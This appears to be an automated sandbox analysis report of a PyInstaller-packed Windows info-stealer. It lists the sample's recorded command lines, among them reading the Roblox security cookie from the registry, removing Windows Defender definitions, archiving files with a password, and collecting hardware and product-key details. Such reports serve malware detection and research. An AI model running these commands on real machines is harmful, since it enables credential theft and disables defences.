MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	73
Start time:	14:19:22
Start date:	31/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	74
Start time:	14:19:23
Start date:	31/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	77
Start time:	14:19:25
Start date:	31/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Imagebase:	0x7ff7356c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	78
Start time:	14:19:25
Start date:	31/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	79
Start time:	14:19:25
Start date:	31/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	80
Start time:	14:19:36
Start date:	31/10/2024
Path:	C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Imagebase:	0x7ff647c90000
File size:	468'120 bytes
MD5 hash:	B3676839B2EE96983F9ED735CD044159
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	81
Start time:	14:19:45
Start date:	31/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe a -r -hp"dave123" "C:\Users\user\AppData\Local\Temp\BfsYI.zip" *"
Imagebase:	0x7ff7356c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	82
Start time:	14:19:45
Start date:	31/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	83
Start time:	14:19:45
Start date:	31/10/2024
Path:	C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe a -r -hp"dave123" "C:\Users\user\AppData\Local\Temp\BfsYI.zip" *
Imagebase:	0x7ff6d7ed0000
File size:	630'736 bytes
MD5 hash:	9C223575AE5B9544BC3D69AC6364F75E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	84
Start time:	14:19:48
Start date:	31/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic os get Caption"
Imagebase:	0x7ff7356c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	85
Start time:	14:19:48
Start date:	31/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	86
Start time:	14:19:48
Start date:	31/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic os get Caption
Imagebase:	0x7ff6e2040000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	87
Start time:	14:19:49
Start date:	31/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
Imagebase:	0x7ff7356c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	88
Start time:	14:19:49
Start date:	31/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	89
Start time:	14:19:49
Start date:	31/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic computersystem get totalphysicalmemory
Imagebase:	0x7ff6e2040000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	90
Start time:	14:19:50
Start date:	31/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Imagebase:	0x7ff7356c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	91
Start time:	14:19:50
Start date:	31/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	92
Start time:	14:19:50
Start date:	31/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic csproduct get uuid
Imagebase:	0x7ff6e2040000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	93
Start time:	14:19:51
Start date:	31/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
Imagebase:	0x7ff7356c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	94
Start time:	14:19:51
Start date:	31/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	95
Start time:	14:19:51
Start date:	31/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	96
Start time:	14:19:52
Start date:	31/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Imagebase:	0x7ff7356c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	97
Start time:	14:19:52
Start date:	31/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	98
Start time:	14:19:52
Start date:	31/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic path win32_VideoController get name
Imagebase:	0x7ff6e2040000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	99
Start time:	14:19:53
Start date:	31/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
Imagebase:	0x7ff7356c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	100
Start time:	14:19:53
Start date:	31/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	101
Start time:	14:19:53
Start date:	31/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	8.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	14.8%
Total number of Nodes:	2000
Total number of Limit Nodes:	37

Executed Functions

Function 00007FF6BA3A89E0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257
synchronizationwindowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6BA3A9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6BA3A45F4,00000000,00007FF6BA3A1985), ref: 00007FF6BA3A93C9

SetConsoleCtrlHandler.KERNEL32(?,?,FFFFFFFF,00007FF6BA3A3F7F), ref: 00007FF6BA3A8A3B
GetStartupInfoW.KERNEL32(?,FFFFFFFF,00007FF6BA3A3F7F), ref: 00007FF6BA3A8A56

Part of subcall function 00007FF6BA3BA47C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3BA490

Part of subcall function 00007FF6BA3B871C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3B8783

GetCommandLineW.KERNEL32(?,FFFFFFFF,00007FF6BA3A3F7F), ref: 00007FF6BA3A8AE6
CreateProcessW.KERNELBASE ref: 00007FF6BA3A8B1E
GetLastError.KERNEL32(?,FFFFFFFF,00007FF6BA3A3F7F), ref: 00007FF6BA3A8B28

Part of subcall function 00007FF6BA3A2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6BA3A3706,?,00007FF6BA3A3804), ref: 00007FF6BA3A2C9E
Part of subcall function 00007FF6BA3A2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6BA3A3706,?,00007FF6BA3A3804), ref: 00007FF6BA3A2D63
Part of subcall function 00007FF6BA3A2C50: MessageBoxW.USER32 ref: 00007FF6BA3A2D99

RegisterClassW.USER32 ref: 00007FF6BA3A8B80
GetLastError.KERNEL32(?,FFFFFFFF,00007FF6BA3A3F7F), ref: 00007FF6BA3A8B8B
CreateWindowExW.USER32 ref: 00007FF6BA3A8BD5
GetLastError.KERNEL32(?,FFFFFFFF,00007FF6BA3A3F7F), ref: 00007FF6BA3A8BE7
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF6BA3A3F7F), ref: 00007FF6BA3A8C02
GetLastError.KERNEL32(?,FFFFFFFF,00007FF6BA3A3F7F), ref: 00007FF6BA3A8C15
PeekMessageW.USER32 ref: 00007FF6BA3A8C39
TranslateMessage.USER32 ref: 00007FF6BA3A8C47
DispatchMessageW.USER32(?,FFFFFFFF,00007FF6BA3A3F7F), ref: 00007FF6BA3A8C51
PeekMessageW.USER32 ref: 00007FF6BA3A8C6C
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF6BA3A3F7F), ref: 00007FF6BA3A8C7E
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF6BA3A3F7F), ref: 00007FF6BA3A8C99
TerminateProcess.KERNEL32(?,FFFFFFFF,00007FF6BA3A3F7F), ref: 00007FF6BA3A8CAF
GetLastError.KERNEL32(?,FFFFFFFF,00007FF6BA3A3F7F), ref: 00007FF6BA3A8CB9
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF6BA3A3F7F), ref: 00007FF6BA3A8CC7
DestroyWindow.USER32(?,FFFFFFFF,00007FF6BA3A3F7F), ref: 00007FF6BA3A8E04
GetExitCodeProcess.KERNELBASE ref: 00007FF6BA3A8E19
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF6BA3A3F7F), ref: 00007FF6BA3A8E22
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF6BA3A3F7F), ref: 00007FF6BA3A8E2F

Strings

PyInstallerOnefileHiddenWindow, xrefs: 00007FF6BA3A8B54
Failed to create child process!, xrefs: 00007FF6BA3A8B30
PyInstaller Onefile Hidden Window, xrefs: 00007FF6BA3A8B95
CreateProcessW, xrefs: 00007FF6BA3A8B37

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
API String ID: 3832162212-3165540532
Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
Instruction ID: c185ad2ac7251cea98abc6702faec32d401d285ff3d3618ac024875ed806b77b
Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
Instruction Fuzzy Hash: 22D13E32A08B9286EB109F78E8542AD77A5FF84B58F404275EF5ED3AA4EF3CD5458700

Function 00007FF6BA3A1000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 511
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to remove temporary directory: %s, xrefs: 00007FF6BA3A3FCF
_PYI_APPLICATION_HOME_DIR not set for onefile child process!, xrefs: 00007FF6BA3A3D35
Could not load PyInstaller's embedded PKG archive from the executable (%s), xrefs: 00007FF6BA3A3971
bye-runtime-tmpdir, xrefs: 00007FF6BA3A3B68
PYINSTALLER_RESET_ENVIRONMENT, xrefs: 00007FF6BA3A3882, 00007FF6BA3A38AF
PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF6BA3A3BE8
VCRUNTIME140.dll, xrefs: 00007FF6BA3A3DB1
_PYI_ARCHIVE_FILE, xrefs: 00007FF6BA3A38D2, 00007FF6BA3A39FF
Py_GIL_DISABLED, xrefs: 00007FF6BA3A3AF4
_PYI_SPLASH_IPC, xrefs: 00007FF6BA3A3A23, 00007FF6BA3A3EF5
Failed to start splash screen!, xrefs: 00007FF6BA3A3ED4
pkg, xrefs: 00007FF6BA3A39BE
Failed to load Tcl/Tk shared libraries for splash screen!, xrefs: 00007FF6BA3A3EBB
pyi-contents-directory, xrefs: 00007FF6BA3A3B8D
pyi-python-flag, xrefs: 00007FF6BA3A3AD6
PYINSTALLER_SUPPRESS_SPLASH_SCREEN, xrefs: 00007FF6BA3A3E0A
Failed to load splash screen resources!, xrefs: 00007FF6BA3A3E85
Failed to initialize security descriptor for temporary directory!, xrefs: 00007FF6BA3A3C61
Could not create temporary directory!, xrefs: 00007FF6BA3A3CBF
Path exceeds PYI_PATH_MAX limit., xrefs: 00007FF6BA3A3D12
pyi-disable-windowed-traceback, xrefs: 00007FF6BA3A3BB2
_PYI_PARENT_PROCESS_LEVEL, xrefs: 00007FF6BA3A3A17, 00007FF6BA3A3A2F, 00007FF6BA3A3A9B
MEI, xrefs: 00007FF6BA3A3933
Failed to convert DLL search path!, xrefs: 00007FF6BA3A3DDC
_PYI_APPLICATION_HOME_DIR, xrefs: 00007FF6BA3A3A0B, 00007FF6BA3A3CD4, 00007FF6BA3A3F6B
Failed to unpack splash screen dependencies from PKG archive!, xrefs: 00007FF6BA3A3EA6
Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s, xrefs: 00007FF6BA3A3B32
Could not side-load PyInstaller's PKG archive from external file (%s), xrefs: 00007FF6BA3A39DE

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
API String ID: 2776309574-3273434969
Opcode ID: 9de477ae995940a39e23314e20718922418974b9c8241bfba060ee61ec72f349
Instruction ID: 5769df13d4cb34b5a81c5f9880665c6c37022f6ebf483ec7a09b1a9e68fcb9e4
Opcode Fuzzy Hash: 9de477ae995940a39e23314e20718922418974b9c8241bfba060ee61ec72f349
Instruction Fuzzy Hash: 33326A26E0CBA291FF199B29D8553BD66A2AF44780F8440B6DF5DC32D6EF2CE559C300

Function 00007FF6BA3C6964 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6BA3C6698: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3C66D9
Part of subcall function 00007FF6BA3C6698: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3C6757
Part of subcall function 00007FF6BA3C6698: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3C67A8

CreateFileW.KERNELBASE ref: 00007FF6BA3C6A6A
CreateFileW.KERNEL32 ref: 00007FF6BA3C6ABA
GetLastError.KERNEL32 ref: 00007FF6BA3C6AEA
GetFileType.KERNELBASE ref: 00007FF6BA3C6AFF
GetLastError.KERNEL32 ref: 00007FF6BA3C6B09
CloseHandle.KERNEL32 ref: 00007FF6BA3C6B3C
CloseHandle.KERNEL32 ref: 00007FF6BA3C6C9F
CreateFileW.KERNEL32 ref: 00007FF6BA3C6CD4
GetLastError.KERNEL32 ref: 00007FF6BA3C6CE3

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
Instruction ID: d2f1252c068806c6d85274bc4632117b0a975a79953561aa522fd67421a244c7
Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
Instruction Fuzzy Hash: 40C1CF36B28B5286EB10CFA9C8906AC3B61FB49B98B415275DF1ED7795EF38D491C300

Function 00007FF6BA3A83C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,00007FF6BA3A8919,00007FF6BA3A3FA5), ref: 00007FF6BA3A842B
RemoveDirectoryW.KERNEL32(?,00007FF6BA3A8919,00007FF6BA3A3FA5), ref: 00007FF6BA3A84AE
DeleteFileW.KERNELBASE(?,00007FF6BA3A8919,00007FF6BA3A3FA5), ref: 00007FF6BA3A84CD
FindNextFileW.KERNELBASE(?,00007FF6BA3A8919,00007FF6BA3A3FA5), ref: 00007FF6BA3A84DB
FindClose.KERNEL32(?,00007FF6BA3A8919,00007FF6BA3A3FA5), ref: 00007FF6BA3A84EC
RemoveDirectoryW.KERNELBASE(?,00007FF6BA3A8919,00007FF6BA3A3FA5), ref: 00007FF6BA3A84F5

Strings

%s\*, xrefs: 00007FF6BA3A83F2

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
String ID: %s\*
API String ID: 1057558799-766152087
Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
Instruction ID: d097f9422ff17ccd52add64778dbe7a2ad092627c8b647c71697cb2f7b283298
Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
Instruction Fuzzy Hash: C3416521A0CA6685EE709F68E4491BE6362FB94755F400272EF9DC36D4EF3CD545C740

Function 00007FF6BA3A9280 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNELBASE ref: 00007FF6BA3A92B3
FindClose.KERNELBASE ref: 00007FF6BA3A92C2

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
Instruction ID: 1227d9f2ab5e5c76a0d82599c0af93e2b57c6a6d221941aecb0d24f7cfe87dc5
Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
Instruction Fuzzy Hash: 97F0C822A1874586FB608F68F49876E7790AB84364F040335DFAED26D4DF3CD048CB00

